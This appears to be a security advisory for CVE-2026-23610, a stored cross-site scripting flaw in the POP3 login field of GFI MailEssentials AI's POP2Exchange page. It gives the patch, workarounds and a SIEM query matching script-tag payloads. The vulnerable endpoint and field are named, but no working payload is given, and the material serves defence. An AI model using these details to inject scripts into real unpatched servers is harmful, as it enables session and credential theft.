CVE-2026-23610
📋 TL;DR
GFI MailEssentials AI versions before 22.4 contain a stored cross-site scripting vulnerability in the POP2Exchange configuration endpoint. An authenticated user can inject malicious scripts into the POP3 server login field, which are stored and executed when viewed in the management interface, potentially compromising other authenticated users' sessions. This affects organizations using vulnerable versions of GFI MailEssentials AI.
💻 Affected Systems
- GFI MailEssentials AI
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
An authenticated malicious insider could inject scripts that steal administrator credentials, hijack sessions, or perform unauthorized administrative actions when other users view the compromised configuration page.
Likely Case
An authenticated user with configuration access could inject scripts that steal session cookies or perform limited actions within the management interface, potentially escalating privileges or accessing sensitive data.
If Mitigated
With proper input validation and output encoding, the malicious payload would be rendered harmless as text rather than executable code.
🎯 Exploit Status
Exploitation requires authenticated access to the management interface and knowledge of the vulnerable endpoint.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 22.4 or later
Vendor Advisory: https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases
Restart Required: Yes
Instructions:
1. Download GFI MailEssentials AI version 22.4 or later from the official vendor site. 2. Backup current configuration. 3. Run the installer to upgrade. 4. Restart the GFI MailEssentials AI service. 5. Verify the update completed successfully.
🔧 Temporary Workarounds
Input Validation Filter
allImplement web application firewall rules or input validation to block HTML/JavaScript in the POP3 server login field.
Access Restriction
allRestrict access to the /MailEssentials/pages/MailSecurity/POP2Exchange.aspx endpoint to only necessary administrative users.
🧯 If You Can't Patch
- Implement strict input validation and output encoding for the POP3 server login field in the application layer.
- Monitor and audit access to the POP2Exchange configuration endpoint for suspicious activity.
🔍 How to Verify
Check if Vulnerable:
Check the GFI MailEssentials AI version in the management interface under Help > About. If version is below 22.4, the system is vulnerable.Check Version:
Not applicable - check version through the web interface.Verify Fix Applied:
After updating to version 22.4 or later, attempt to inject basic HTML/JavaScript into the POP3 server login field and verify it is properly sanitized and displayed as plain text.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to /MailEssentials/pages/MailSecurity/POP2Exchange.aspx/Save with HTML/JavaScript in parameters
- Multiple failed login attempts followed by configuration changes
Network Indicators:
- HTTP POST requests containing script tags or JavaScript functions in the popServers JSON payload
SIEM Query:
source="web_server" AND (url="/MailEssentials/pages/MailSecurity/POP2Exchange.aspx/Save" AND (request_body CONTAINS "<script>" OR request_body CONTAINS "javascript:"))